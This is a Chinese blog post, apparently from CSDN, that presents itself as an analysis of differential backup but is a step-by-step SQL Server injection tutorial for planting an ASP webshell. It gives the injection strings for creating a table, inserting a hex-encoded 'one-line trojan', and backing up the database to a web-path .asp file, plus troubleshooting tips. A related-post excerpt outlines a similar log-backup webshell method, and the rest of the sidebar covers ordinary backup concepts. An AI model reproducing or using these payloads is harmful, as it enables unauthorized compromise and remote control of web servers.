深度剖析差异备份

最新推荐文章于 2023-09-12 11:30:28 发布
最新推荐文章于 2023-09-12 11:30:28 发布
阅读量359 收藏
点赞数
分类专栏: 网络安全篇 文章标签: 差异备份 三朝看客
dangcafe
本文链接:https://blog.csdn.net/xaiodang/article/details/96436107
版权

一、差异备份的条件:

1、要有列目录的权限(能列目录当然不能低于DB_owner)
2、HTTP500错误不是自定义。可能大家不明白这是什么意思。
3、WEB和数据在一块。还有的就是数据库中不能存在%号之类的,不然也是不成功的。
4、数据量不能太大,太大了没法在IE打开。

PS:列目录这个权限可有可无,但是你得知道WEB路径。

二、差异备份的步骤:

第一步:
;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x库名 backup database @a to disk=@s–

备份当前数据库,以差异备份. “0x库名”这里备份的库名转换成16位进制。

PS:当遇到字符型的注入点时要在;号前加一’号,如:htttp://www.hack58.com/list.asp?id=hack’;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x库名 backup database @a to disk=@s–

第二步:
;Drop table [hack58];create table [dbo].[hack58] ([cmd] [image])–
建表加字段…

第三步:
insert into hack58(cmd) values(0x一句话木马)–

写入一句话木马 “0x一句话木马”用一句话木马的16位进制代码

第四步:
;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x备份路径 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT-- 备份得到shell

这是最关键的一步bakshell
“0x备份路径” 这是备份的Web路径的16位进制编码,也就是webshell的路径
假如备份的是F:\web\hack58.asp
16进制: 0x463A5C7765625C6861636B35382E617370

查看是否备份成功

第五步:
Drop table [hack58]–
删除表
个人认为删不删无所谓,最好还是删了

PS:如果用一句话客户端连不上
分两种情况:

1.磁盘没有写的权限(找个有写的权限的目录重新备份,有可能成功)

2.FSO被删

三朝看客
关注
专栏目录
什么是数据库差异备份
whaxrl的专栏
03-31 2337
差异备份的理解   差异备份是指对上一次完整备份之后所有更改的数据作备份备份过程能够识别出数据哪些数据被改变了,它就对哪些数据进行备份。例如:我首先执行了一个完整备份把某个数据库备份了一下,然后我在这个数据库里面添加了一个表。然后我又进行差异备份,那么差异备份备份这个数据库完整备份以后更改的数据,也就是只备份那个表。差异备份的优势是速度,备份数据库所需的时间很少,但差异备份要求事先已执行过
SQLServer数据库差异备份
weixin_30344795的博客
08-11 945
差异备份 (differential backup)定义 一种数据备份,基于完整数据库或部分数据库或一组数据文件或文件组(差异基准)的最新完整备份,并且仅包含自确定差异基准以来发生更改的数据。 使用SSMS数据库管理工具进行数据库差异备份 1、选择数据库-》右键点击-》选择任务-》选择备份。 2、在备份数据库弹出框中-》选择备份类型为差异-》然后删除系统生成的目标文件-》然后点击添加。...
差异备份的最佳方法
dida4700的博客
06-27 312
差异备份的最佳方法 安排差异数据库备份的最佳方法 对于大型数据库,完整数据库备份需要大量磁盘空间。为了节省时间和磁盘空间,可以在一次完整数据库备份后安排多次差异备份。每次连续的差异数据库备份都大于前一次备份,这就需要更长的备份时间、还原时间和更大的空间。因此,...
什么是差异备份,什么增量备份?
灌水专栏
09-21 1486
什么是差异备份,什么增量备份 ?都是相对于完全备份而言:差异备份备份自上次完全备份之后的改变。所以,如果有2个连续差异备份,两个差异备份会有重复。恢复时,只需一个差异备份和最后一次完全备份。增量备份备份自上次(低一级)备份之后的改变。通常分级别 1 到 9,0级即为完全备份。假设备份次序是 0,2,3,1,5, 则备份 5 会备份自 3 之后的改变。恢复时,通常需要多个增量备份和最后一次完
DB_ONER权限日志备分专用一句话木马
软体疯子专栏
11-29 1511
 来自:s0n9 5 b109 备分专用一句话加个response.end会有不一样的效果,也就是插入一句话后所有的代码都无效,在一句话这里打止,也就减小了webshell的大小.日志备分WEBSHELL标准的七步:1.InjectionURL;alter database XXX set RECOVERY FULL-- (把SQL设置成日志完全恢复模式)2.InjectionURL;cre
InnoDB存储引擎原理深度剖析
# 1. InnoDB存储引擎概述 ## 1.1 InnoDB存储引擎的发展历程 InnoDB存储引擎是MySQL数据库管理系统的一部分,最初由Innobase Oy 公司开发。2005年,Oracle收购了Innobase Oy,并持续对InnoDB存储引擎进行改进和优化...
医院信息化现状与挑战深度剖析
1. 被调查者基本情况:这部分收集了医院的基本信息,包括医院名称、地理位置、等级等,以便于分析不同规模和级别的医院在信息化进程中的差异。 2. 规范化与标准化:标准化体系的建立是衡量医院信息化成熟度的重要...
Redis深度剖析:揭示redis-py工作机制的10个秘密
Redis深度剖析导论 Redis作为一个高性能的分布式内存数据库,其独特之处在于提供了多种数据结构,并且支持持久化和复制等多种功能。本章将对Redis的核心特性进行简要概述,为后续章节中的深入讲解做铺垫。我们将从...
Linux Mint软件管理深度剖析:apt与Synaptic的终极对比
[Linux Mint软件管理深度剖析:apt与Synaptic的终极对比](http://embeddedinventor.com/wp-content/uploads/2021/01/image-50-1024x598.png) # 1. Linux Mint软件管理基础 Linux Mint作为一款流行的桌面操作系统,...
Asahi Linux安全机制深度剖析:防火墙与安全模块应用实战
[Asahi Linux安全机制深度剖析:防火墙与安全模块应用实战](https://www.redeszone.net/app/uploads-redeszone.net/2020/01/nftables-firewall-linux-logo-930x487.jpg) # 1. Asahi Linux安全机制概述 ## 1.1 Asahi...
文件同步备份工具(实现差异、增量同步)
02-14
文件同步备份可以在指定的两个文件夹之间进行单向或双向的同步,点击程序窗口右上方的绿色齿轮图标可以设置相关参数;期间也可以自定义需要筛选的文件,有“包括”和“例外”两种过滤方式,定义需要过滤的文件类型,这就看个人需要了。此外就是比较不同文件夹中的文件是否相同的功能,不过这个功能比较适合同步之前使用,比较的结果会直接显示在列表中,方便查看,这样你就可以清楚的知道是否需要进行同步操作了,节省系统资源。工具(实现差异、增量同步)
差异备份详细说明(InsCode AI 创作助手)
最新发布
LSW1737554365的博客
09-12 689
差异备份(Differential Backup)是一种备份策略,它与增量备份类似,但有一些关键区别。差异备份备份的是自上一次完整备份以来的所有更改数据,而不是自上一次备份以来的所有更改。这意味着差异备份文件会随着时间的推移变得越来越大,但相比每次都备份所有数据,它仍然可以节省大量存储空间。
[CentOS7] 常用工具 之 差异备份工具 rdiff-backup
weixin_30819163的博客
12-13 1151
差异备份: rdiff-backup  ==> 用于累积差异备份,加上自己写的shell script,每日备份,效果更佳 先用yum search rdiff-backup看看是否yum源含有rdiff-backup这个package,若没有的话请yum install epel-release 接下来yum installrdiff-backup 用法用man来查一下...
【Python笔记】no.3 练习-实现linux下的差异备份
Rei的博客
09-30 724
前序 首先,说明一下我的程序大概能做什么事:标题是实现linux下的差异备份,但我这里只是实现基本的功能,没有针对输出格式错误的时候进行处理!差异备份是指在一次全备份后到进行差异备份的这段时间内,对那些增加或者修改文件的备份,但是我这里只能备份增加的和对文件名修改过的文件进行备份,不能备份只修改内容的文件,后续会解决。 代码: #coding=utf-8 import mbackup
差异备份、增量备份的区别
Mason's Blog
03-16 989
百度上的,通俗易懂: 以完全备份为基础,每个时间段变化的数据叫差异。 如星期一完全备份,星期2的差异含有星期2增加的,星期3的差异备份有星期2和星期3的。 以任何一次备份为基础,发生的变化叫增量。 如星期一完全备份,星期2的增量含有星期2增加的,星期3的增量备份只有星期3的。这个要恢复备份就麻烦了。
mysql数据库(完全备份,增量备份差异备份
m0_64505752的博客
09-05 2415
开启MySQL服务器的二进制日志功能。对数据库进行完全备份
什么是完全备份差异备份,增量备份
软体疯子专栏
03-31 2338
备份种类的介绍及组合备份方案 完全备份备份全部选中的文件夹,并不依赖文件的存档属性来确定备份那些文件。( 在备份过程中,任何现有的标记都被清除,每个文件都被标记为已备份,换言之,清除存档属性)。差异备份差异备份是针对完全备份备份上一次的完全备份后发生变化的所有文件。(差异备份过程中,只备份有标记的那些选中的文件和文件夹。它不清除标记,既:备份后不标记为已备份文件,换言之,不清除存档属性)
增量备份差异备份的区别
weixin_34106122的博客
11-12 4139
一般都三种备份种类:完全备份差异备份、增量备份。 完全备份备份全部选中的文件夹,并不依赖文件的存档属性来确定备份那些文件。(在备份过程中,任何现有的标记都被清除,每个文件都被标记为已备份,换言之,清除存档属性)。差异备份差异备份是针对完全备份备份上一次的完全备份后发生变化的所有文件。(差异备份过程中,只备份有标记的那些选中的文件和文件夹。它不...
数据备份策略学习
山鬼谣弋痕夕的博客
03-14 971
在进行数据备份时,可以采用不同的备份策略,主要的备份策略一般分为完全备份、增量备份差异备份,我们分别来介绍。 完全备份 完全备份是指把所有需要备份的数据全部备份。当然,完全备份可以备份整块硬盘、整个分区或某个具体的目录。 完全备份的好处是数据恢复方便,因为所有的数据都在同一个备份中,所以只要恢复完全备份,所有的数据都会被恢复。如果完全备份备份的是整块硬盘,那么甚至不需要数据恢复,只要把备份硬...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

三朝看客

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值